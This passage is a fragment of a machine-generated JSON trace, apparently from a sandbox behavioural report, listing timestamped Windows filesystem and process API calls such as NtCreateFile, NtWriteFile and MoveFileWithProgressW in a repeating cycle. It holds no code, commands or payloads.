"MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,163", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,163", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,163", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,163", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,163", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,163", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,163", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,163", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,173", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,173", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,173", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,173", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,173", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,173", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,173", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,173", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,183", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,183", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,183", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,183", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,183", "api": "NtSetInformationFile"}, 
{"category": "process", "timestamp": "2016-02-16 17:41:42,183", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,183", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,183", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,193", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,193", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,193", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,193", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,193", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,193", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,193", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,193", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,193", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,193", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,193", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,203", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,203", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,203", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,203", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,203", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,203", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,203", "api": "NtSetInformationFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:42,203", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,213", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,213", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,213", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,213", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,213", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,213", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,213", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,213", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,213", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,213", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,223", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,223", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,223", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,223", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,223", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,223", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,223", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,223", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,223", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,223", "api": "FindFirstFileExW"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:42,233", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,233", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,233", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,233", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,233", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,233", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,233", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,233", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,233", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,243", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,243", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,243", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,253", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,253", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,253", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,253", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,253", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,253", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,253", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,263", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:42,263", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,263", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,263", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,263", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,263", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,263", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,263", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,263", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,263", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,263", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,263", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,263", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,273", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,273", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,273", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,273", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,273", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,273", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,273", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,273", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,273", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,273", 
"api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,273", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,283", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,283", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,283", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,283", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,283", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,283", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,283", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,283", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,283", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,283", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,293", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,293", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,293", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,293", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,293", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,293", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,293", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,293", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,293", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,293", "api": 
"NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,303", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,303", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,313", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,313", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,313", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,313", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,313", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,323", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,323", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,323", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,323", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,323", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,323", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,323", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,323", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,323", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,333", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,333", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,333", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,333", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,333", "api": "MoveFileWithProgressW"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:42,333", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,333", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,333", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,333", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,333", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,343", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,343", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,343", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,343", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,343", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,343", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,343", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,343", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,353", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,353", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,353", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,353", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,353", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,353", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,353", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,353", "api": "NtSetInformationFile"}, {"category": "process", 
"timestamp": "2016-02-16 17:41:42,363", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,363", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,363", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,363", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,363", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,363", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,363", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,363", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,373", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,373", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,373", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,373", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,373", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,373", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,373", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,373", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,383", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,383", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,383", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,383", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,383", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:42,383", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,383", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,383", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,383", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,383", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,393", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,393", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,393", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,393", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,393", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,393", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,393", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,393", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,393", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,413", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,413", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,413", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,413", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,413", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,423", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,423", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,423", 
"api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,423", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,423", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,423", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,423", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,423", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,433", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,433", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,433", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,433", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,433", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,433", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,433", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,433", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,443", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,443", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,443", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,443", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,443", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,443", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,443", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,443", "api": 
"NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,443", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,453", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,453", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,453", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,453", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,453", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,453", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,453", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,453", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,463", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,463", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,463", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,463", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,463", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,463", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,463", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,463", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,463", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,463", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,473", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,473", "api": 
"NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,473", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,473", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,473", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,473", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,473", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,473", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,473", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,473", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,473", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,483", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,483", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,483", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,483", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,483", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,483", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,493", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,493", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,493", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,493", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,503", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,503", "api": "NtCreateFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:42,503", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,503", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,503", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,503", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,503", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,503", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,503", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,503", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,513", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,513", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,513", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,513", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,513", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,513", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,513", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,513", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,513", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,513", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,523", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,523", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,523", "api": "NtWriteFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:42,523", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,523", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,523", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,523", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,523", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,523", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,523", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,523", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,523", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,533", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,533", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,533", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,533", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,533", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,533", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,533", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,533", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,533", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,533", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,543", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,543", "api": "NtReadFile"}, {"category": "filesystem", 
